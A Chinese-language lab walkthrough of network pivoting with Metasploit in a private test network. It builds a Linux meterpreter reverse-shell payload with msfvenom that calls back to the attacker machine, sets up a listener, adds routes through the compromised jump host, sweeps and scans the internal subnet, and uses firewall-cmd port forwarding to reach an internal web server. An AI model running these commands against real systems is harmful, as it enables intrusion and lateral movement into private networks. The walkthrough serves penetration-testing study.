- 攻击机 Kali 192.168.114.62
- 跳板机 Linux 192.168.114.84 10.10.10.200
TYPE=Ethernet PROXY_METHOD=none BROWSER_ONLY=no BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no IPV6_ADDR_GEN_MODE=stable-privacy NAME=ens36 DEVICE=ens36 ONBOOT=yes IPADDR="10.10.10.200" NETMASK="255.255.255.0" GATEWAY="10.10.10.1" #如果添加网卡出错,可以手动配置
- 内网机 2003 server 10.10.10.136
- 生成对应的payload
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.114.62 LPORT=8888 -f elf > /tmp/msfshell.elf #针对linux跳板机生成木马
- 进入msf
use exploit/multi/handler 设置选项,进行监听
- 监听成功
- 进行路由查看
run get_local_subnets 查看目标主机的路由情况 发现目标有两个网段 run post/multi/manage/autoroute 自动添加木马所在主机上的所有路由 run autoroute -p 查看添加的路由
- 添加成功
- 进行ip扫描,试探内部有哪些主机存活
将木马挂起 auxiliary/scanner/discovery/udp_sweep 切换探测存活主机
- 根据存活ip,进行端口扫描
- 根据已经存在的端口,进行一个基础探测
use auxiliary/scanner/http/http_version #探测80端口 10.10.10.136:80 Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
- 使用端口转发进行访问
使用shell,进入 echo "1" > /proc/sys/net/ipv4/ip_forward #开启端口转发 firewall-cmd --add-masquerade #开启IP伪装 firewall-cmd --add-forward-port=port=1060:proto=tcp:toaddr=10.10.10.136:toport=80